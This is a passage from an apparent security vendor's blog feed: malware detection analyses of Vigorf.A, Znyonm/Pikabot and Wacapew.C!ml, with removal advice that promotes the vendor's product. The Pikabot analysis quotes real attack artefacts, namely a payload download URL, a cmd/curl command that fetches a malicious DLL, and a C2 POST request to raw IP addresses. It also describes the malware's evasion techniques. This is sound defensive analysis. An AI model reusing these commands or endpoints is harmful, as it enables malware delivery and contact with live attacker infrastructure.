http[:]//194.163.43.166/08/st/m.zip

Files downloaded from these addresses were disguised as ordinary documents or incomplete files, making them difficult to detect and analyze. Once Vigorf finishes downloading the malware, it uses system utilities such as wuapp.exe to launch it.

"C:\Windows\System32\wuapp.exe" -c "C:\ProgramData\sHrhJDaCBu\cfg"

How to Remove Trojan:Win32/Vigorf.A?

To remove Trojan:Win32/Vigorf.A, I recommend using GridinSoft Anti-Malware. It will detect and remove Vigorf.A, as well as find other malicious programs downloaded by it. This Anti-Malware can also work with Windows Defender to create an additional line of defense.

It is important to run a Full Scan and remove all detected threats. I would also recommend keeping the system and all programs updated to the latest versions to eliminate vulnerabilities that malware can exploit.

The post Trojan:Win32/Vigorf.A appeared first on Gridinsoft Blog.

Trojan:Win32/Znyonm Detection Overview

Trojan:Win32/Znyonm is a detection associated with backdoor malware, usually the one that uses deep obfuscation and anti-analysis techniques. In particular, this detection name appears with malware like GuLoader, Remcos RAT, and Pikabot. Others can also be seen though, as Microsoft does not attach this detection name to specific malware families, but rather to its properties.

The primary objectives of Znyonm include facilitating remote access or deploying additional payloads. As a preliminary stage, it establishes persistence within systems, escalates privileges, and communicates with command-and-control (C2) servers. Among the samples found on VirusTotal, I’ve seen the usage of multi-stage loading of code fragments from remote servers via .LNK, VBS, and PowerShell scripts. This allows it to bypass antivirus detection and deliver any malicious payload to the victim’s computer.

Znyonm Trojan Analysis

For the sample of Znyonm to analyze, I’ve picked one of fresh samples of Pikabot. This is a modular backdoor malware that emerged in early 2023. The malware gained prominence as a substitute for the infamous QakBot. The malware serves as an initial access point in high-profile cyberattacks. Its primary tactic for initial access is spear phishing and thread-hijacking techniques. Pikabot deploys exploit kits, ransomware, or other malware tools.

Spreading ways

Znyonm/Pikabot gains initial access through spear phishing. It targets users with convincing emails that look like routine workflow messages; frauds particularly employ thread hijacking to make it look genuine. The format of the attachment may vary – from a PDF document to a ZIP archive that contains the payload. In either case, email text will try to convince the user to launch the attachment and follow its instructions.

Another method is malvertising via major ad engines like Google or Facebook. Hackers trick users into downloading and installing malware by using the names of popular free software, drivers, and tools. The sites used in these campaigns live for an extremely short time but can infect hundreds of users.

Unpacking, Launch & Persistence

Upon execution, Znyonm runs a set of checks to avoid analysis, by calling NtQueryInformationProcess. Then, it decrypts the DLL file and performs another round of anti-analysis and anti-debug tricks. After passing them, the malware assembles its core from encrypted parts of the DLL it arrives in. To gain persistence and privileges, Pikabot/Znyonm performs process hollowing.

C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll

Pikabot malware avoids detection by directly calling the required APIs using their hash for the first 3 APIs. Next, it switches to dynamic API resolution to evade EDR/XDR detection. The malware checks the system language before gathering system information, ceasing execution if one from the ban list is found. After passing the check, it collects system properties to fingerprint the system.

The fingerprint includes user name, computer name, display information, CPU information, physical and virtual memory, domain controller name, operating system version, and a snapshot of its process. This is a typical set of data for backdoor malware, called to distinguish one system from another. Some backdoors though were gaining the ability to collect more data with time, getting closer in functionality to spyware.

C2 Communication

The malware sends collected data to the command server using an HTTP POST request over HTTPS protocol. Upon the first contact, the command server sends the response with the command and configuration info. The latter consists of a command-specific code, URL, file address, and the action malware should execute. Some of the commands also require Pikabot to send the results to the C2.

POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2

How to Remove Trojan:Win32/Znyonm?

If you receive a notification about Trojan:Win32/Znyonm detection, an anti-malware scanning is needed. As you can see from the analysis above, Znyonm is nothing to mess around with, and can lead to more serious and diverse malware infections. Gridinsoft Anti-Malware will fit perfectly for malware removal. Launch a Full scan and let it finish – it will take care of every dangerous thing present in your system.

The post Trojan:Win32/Znyonm appeared first on Gridinsoft Blog.

What is Win32/Wacapew.C!ml?

Program:Win32/Wacapew.C!ml is a heuristic detection designed to detect a suspicious program. However, it is not a specific virus or malware. Microsoft Defender uses this type of detection to identify a wide range of questionable applications. All programs detected with this name typically exhibit suspicious properties. These include the ability to read and modify specific file properties, download data from remote servers, and rename themselves, which may indicate malicious behavior.

While these functions are barely enough to be sure about the program’s intentions, in the situations when other detection systems can neither prove nor deny the detection, the Defender is obligated to show the Wacapew.C!ml detection. It is more like “I don’t like this program” rather than “It is malicious”.

Among the typical examples of software detected as Wacapew are self-made applications or sketchy applets found on the Web. For instance, Microsoft Defender may flag a Python script converted into an EXE file as Wacapew for the request of admin privileges. Malware creators commonly use this conversion process, hence the suspicion arises.

Is It false positive?

Since detection with an “ml” ending means the use of an AI detection system, there is a possibility of it being a false positive. This adds on top of the blurry definition the Wacapew detection stands for. Normally, other detection systems should reject or approve the detection, leading to a different detection name or no detection at all. This, however, is not how it works in this case.

If Microsoft Defender detects a legit program with this name, be sure that you’re dealing with a false positive detection. But if you are not sure about the affected file’s origins and genuinity, consider scanning it with our Free Online Virus Scanner. It will analyze the file using its own detection systems, and give you a verdict whether the file is any dangerous, or not.

Win32/Wacapew.C!ml Examples

The most prominent example of Wacapew detection is the Ollama model AI installer. Users online recon that the reason here is its similarity with Inno Setup-based installers. Inno Setup is a free installer for Windows programs that uses the eponymous script language and allows developers to fine-tune the installation process. However, besides the Inno installers, antivirus software detects installation files created with PyInstaller. In this case, the trigger is the lack of a file signature.

Another striking example is users’ files, such as architectural 3d models created with Enscape. GitHub also contains reports that downloaded files made in this program are detected as Win32/Wacapew.C!ml. In addition to all the above, such detections are not rare in pirated software. Since most of the latter is packaged with the said Inno Setup and may also have other questionable properties, Microsoft Defender starts showing the detection.

As you can see, any file without a proper signature and/or with something that may resemble a questionable one about it may trigger the Wacapew detection. Nonetheless, I would not recommend you to ignore the detection completely, as sometimes it can point at a genuinely dangerous app.

How to Remove Win32/Wacapew.C!ml?

Unfortunately, some users have problems with Win32/Wacapew.C!ml removal. In some cases, Defender fails to remove malware, showing notifications for files no longer on the device. To make sure your device is clean, I recommend using GridinSoft Anti-Malware. It will detect and remove Wacapew and find other malware. It can also work with Windows Defender to create an additional line of defense.

The post Win32/Wacapew.C!ml Detection Analysis & Recommendations appeared first on Gridinsoft Blog.